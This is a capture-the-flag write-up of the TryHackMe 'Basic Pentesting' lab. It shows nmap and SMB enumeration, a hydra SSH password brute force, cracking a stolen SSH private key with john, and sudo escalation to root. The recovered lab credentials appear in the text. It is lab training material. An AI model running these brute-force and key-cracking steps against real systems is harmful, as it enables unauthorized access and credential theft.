mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-10 14:44:20 +00:00
16 KiB
16 KiB
TryHackMe-Basic Pentesting
Abdullah Rizwan | 07:04 PM | 1st November , 2020
NMAP
Nmap scan report for 10.10.207.136
Host is up (0.17s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13?
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http-proxy
| fingerprint-strings:
| ms-sql-s, oracle-tns:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 2243
| Date: Sun, 01 Nov 2020 14:11:05 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
|_ Request</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font
ily:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-c
olor:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;
color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name
{color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><bod
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/
submit.cgi?new-service :
SF-Port8080-TCP:V=7.80%I=7%D=11/1%Time=5F9EC1F9%P=x86_64-pc-linux-gnu%r(or
SF:acle-tns,95F,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charse
SF:t=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x202243\r\nDate:\
SF:x20Sun,\x2001\x20Nov\x202020\x2014:11:05\x20GMT\r\nConnection:\x20close
SF:\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Sta
SF:tus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"te
SF:xt/css\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:white;backgro
SF:und-color:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,s
SF:ans-serif;color:white;background-color:#525D76;font-size:16px;}\x20h3\x
SF:20{font-family:Tahoma,Arial,sans-serif;color:white;background-color:#52
SF:5D76;font-size:14px;}\x20body\x20{font-family:Tahoma,Arial,sans-serif;c
SF:olor:black;background-color:white;}\x20b\x20{font-family:Tahoma,Arial,s
SF:ans-serif;color:white;background-color:#525D76;}\x20p\x20{font-family:T
SF:ahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}\x2
SF:0a\x20{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x20{height:
SF:1px;background-color:#525D76;border:none;}</style></head><bod")%r(ms-sq
SF:l-s,95F,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charset=utf
SF:-8\r\nContent-Language:\x20en\r\nContent-Length:\x202243\r\nDate:\x20Su
SF:n,\x2001\x20Nov\x202020\x2014:11:05\x20GMT\r\nConnection:\x20close\r\n\
SF:r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Status\x
SF:20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"text/cs
SF:s\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:white;background-c
SF:olor:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,sans-s
SF:erif;color:white;background-color:#525D76;font-size:16px;}\x20h3\x20{fo
:0{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x20{height:1px;b
SF:ackground-color:#525D76;border:none;}</style></head><bod");
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2020-11-01T09:11:08-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-11-01T14:11:08
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.02 seconds
PORT 80
PORT 8080
Smb Shares
Port 139 and 445 are open see lets see if we can access the samba shares
From the staff.txt that we just grabbed , we can find two usernames jan and kay.
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay
Gobuster
Running gobuster we can find a directory /development
gobuster dir -u http://10.10.207.136/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.207.136/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/11/01 19:18:49 Starting gobuster
===============================================================
/development (Status: 301)
Progress: 3698 / 220561 (1.68%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/11/01 19:20:02 Finished
===============================================================
j.txt
For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
dev.txt
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
Hydra
Now jan is the username we found and it has a weak password so lets bruteforce it using hydra and we know that there is ssh runnin on the box so,
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.207.136
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-01 19:27:32
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.207.136:22/
[STATUS] 176.00 tries/min, 176 tries in 00:01h, 14344223 to do in 1358:22h, 16 active
t[STATUS] 112.00 tries/min, 336 tries in 00:03h, 14344063 to do in 2134:32h, 16 active
tt
[22][ssh] host: 10.10.207.136 login: jan password: armando
Visti kay's home directory and there you can read .ssh/id_rsa private key for logging into ssh , send and receive it through netcat
But we still cannot login because that id_rsa is password protected
Use ssh2john to get hash of id_rsa file
root@kali:~/TryHackMe/Easy/BasicPentesting# /usr/share/john/ssh2john.py id_rsa > hash_for_id_rsa
Now run john hash_for_id_rsa
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Proceeding with incremental:ASCII
0g 0:00:00:56 3/3 0g/s 2748Kp/s 2748Kc/s 2748KC/s pigr3sr..pigr0ts
0g 0:00:00:57 3/3 0g/s 2760Kp/s 2760Kc/s 2760KC/s jalyoun..jalyof4
0g 0:00:00:58 3/3 0g/s 2772Kp/s 2772Kc/s 2772KC/s 1llgod..1llgu1
0g 0:00:05:23 3/3 0g/s 2294Kp/s 2294Kc/s 2294KC/s fcp0luf..fcp0l46
0g 0:00:05:24 3/3 0g/s 2297Kp/s 2297Kc/s 2297KC/s nadah76..nadahro
0g 0:00:06:36 3/3 0g/s 2351Kp/s 2351Kc/s 2351KC/s gaudlsd..gaudsk3
0g 0:00:07:21 3/3 0g/s 2381Kp/s 2381Kc/s 2381KC/s civlup42..civl12mt
0g 0:00:07:22 3/3 0g/s 2384Kp/s 2384Kc/s 2384KC/s adiskak2..adiskuas
0g 0:00:09:14 3/3 0g/s 2527Kp/s 2527Kc/s 2527KC/s cornsexice..cornsexto1
0g 0:00:09:15 3/3 0g/s 2528Kp/s 2528Kc/s 2528KC/s cujkdc1..cujkdd4
0g 0:00:09:16 3/3 0g/s 2530Kp/s 2530Kc/s 2530KC/s bslhmf6..bslhm82
0g 0:00:09:17 3/3 0g/s 2532Kp/s 2532Kc/s 2532KC/s psyctiu..psyct29
0g 0:00:09:18 3/3 0g/s 2534Kp/s 2534Kc/s 2534KC/s tr00ge1..tr00gak
0g 0:00:09:19 3/3 0g/s 2536Kp/s 2536Kc/s 2536KC/s kmdufs1..kmduf6q
0g 0:00:12:52 3/3 0g/s 2458Kp/s 2458Kc/s 2458KC/s ecicos7..ecicots
0g 0:00:12:53 3/3 0g/s 2460Kp/s 2460Kc/s 2460KC/s eussce7..eussc14
0g 0:00:12:54 3/3 0g/s 2461Kp/s 2461Kc/s 2461KC/s exxza8f..exxzay!
0g 0:00:12:55 3/3 0g/s 2463Kp/s 2463Kc/s 2463KC/s eevzco5..eevzcuk
0g 0:00:12:56 3/3 0g/s 2464Kp/s 2464Kc/s 2464KC/s ublhl..ublni
0g 0:00:12:57 3/3 0g/s 2466Kp/s 2466Kc/s 2466KC/s 0zjnhb..0zjnd4
0g 0:00:12:58 3/3 0g/s 2467Kp/s 2467Kc/s 2467KC/s l4zb3n..l4zpay
0g 0:00:12:59 3/3 0g/s 2469Kp/s 2469Kc/s 2469KC/s hfu71s..hfu706
0g 0:00:13:01 3/3 0g/s 2471Kp/s 2471Kc/s 2471KC/s 4s18le..4s18cw
0g 0:00:13:02 3/3 0g/s 2473Kp/s 2473Kc/s 2473KC/s mcjau03..mcjau25
0g 0:00:13:03 3/3 0g/s 2474Kp/s 2474Kc/s 2474KC/s cim0cno..cim0c11
beeswax (id_rsa)
Now to become root we can run ALL commands
Matching Defaults entries for kay on basic2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User kay may run the following commands on basic2:
(ALL : ALL) ALL
kay@basic2:~$
so sudo bash
